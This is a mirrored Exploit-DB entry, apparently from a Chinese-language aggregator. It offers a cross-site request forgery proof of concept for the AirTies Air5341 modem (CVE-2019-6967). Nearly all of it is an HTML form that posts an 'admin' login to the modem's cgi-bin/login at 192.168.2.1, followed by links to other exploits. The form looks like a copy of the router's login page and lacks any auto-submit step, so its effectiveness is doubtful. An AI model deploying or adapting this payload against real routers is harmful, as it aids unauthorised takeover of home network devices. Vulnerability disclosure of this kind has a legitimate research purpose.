AirTies Air5341 Modem 1.0.0.12 – Cross-Site Request Forgery

Exploit Database
16 阅读

作者： Ali Can Gönüllü

日期： 2019-01-28
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/46253/

# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can Gönüllü

<html>
<form method="POST" name="formlogin" action="
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
 <input type="hidden" id="redirect" name="redirect">
 <input type="hidden" id="self" name="self">
 <input name="user" type="text" id="uiPostGetPage" value="admin"
size="">
 <input name="password" type="password" id="uiPostPassword" size="">
<input onclick="uiDologin();" name="gonder" type="submit"
class="buton_text" id="__ML_ok" value="TAMAM"
style="background-image:url(images/buton_bg2.gif); height:21px;
width:110px; border: 0ptnone">
</form>
</html>

last Exploits
AirTies Air5341 Modem 1.0.0.12 – Cross-Site Request Forgery的更多信息

Saurus CMS 4.7 – ‘edit.php’ Cross-Site Scripting：
Netgear WNDR3400 N600 Wireless Dual Band – Multiple Vulnerabilities：
acontent 1.1 – Multiple Vulnerabilities：
BackupPC 3.x – ‘index.cgi’ Multiple Cross-Site Scripting Vulnerabilities：
WordPress Plugin ultimate-member 2.1.3 – Local File Inclusion：
Pegasus CMS 1.0 – ‘extra_fields.php’ Plugin Remote Code Execution：
Synology Photo Station 5 DSM 3.2 – ‘photo_one.php’ Script Cross-Site Scripting：
Multi Restaurant Table Reservation System 1.0 – Multiple Persistent XSS：